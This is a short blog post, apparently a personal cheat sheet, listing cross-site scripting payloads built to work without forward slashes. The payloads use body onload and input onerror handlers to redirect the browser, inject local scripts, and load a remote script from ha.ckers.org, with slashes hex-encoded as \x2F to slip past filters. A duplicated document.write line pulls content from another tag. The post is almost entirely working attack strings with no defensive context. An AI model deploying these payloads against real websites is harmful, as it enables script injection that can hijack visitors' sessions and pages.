Post discovery
- Load a new URL in browser window without forward slash
<body onload=window.location='https:youtube.com'>
- Load a local js file from same folder without forward slash
<body onload=document.getElementsByTagName('head')[0].appendChild(document.createElement('script')).setAttribute('src','test.js')>
<body onload=document.head.appendChild(document.createElement('script')).setAttribute('src','test.js')>
- Load a remote js file from web without forward slash
<input type="image" src="a" onerror=document.getElementsByTagName('head')[0].appendChild(document.createElement('script')).setAttribute("src","http:\x2F\x2Fha.ckers.org\x2Fxss.js")>
\x2F is evaluated to hex decoded to / inside javascript before js execution on HTML page.
<body onload=document.head.appendChild(document.createElement('script')).setAttribute('src','http:\x2F\x2Fha.ckers.org\x2Fxss.js')>
<input type="image" src="a" onerror=document.getElementsByTagName('head')[0].appendChild(document.createElement('script')).setAttribute("src","http://ha.ckers.org/xss.js")>
document.write(document.getElementsByTagName('noscript')[0].innerHTML); # pull data from any tag
document.write(document.getElementsByTagName('noscript')[0].innerHTML); # pull data from any tag
No comments:
Post a Comment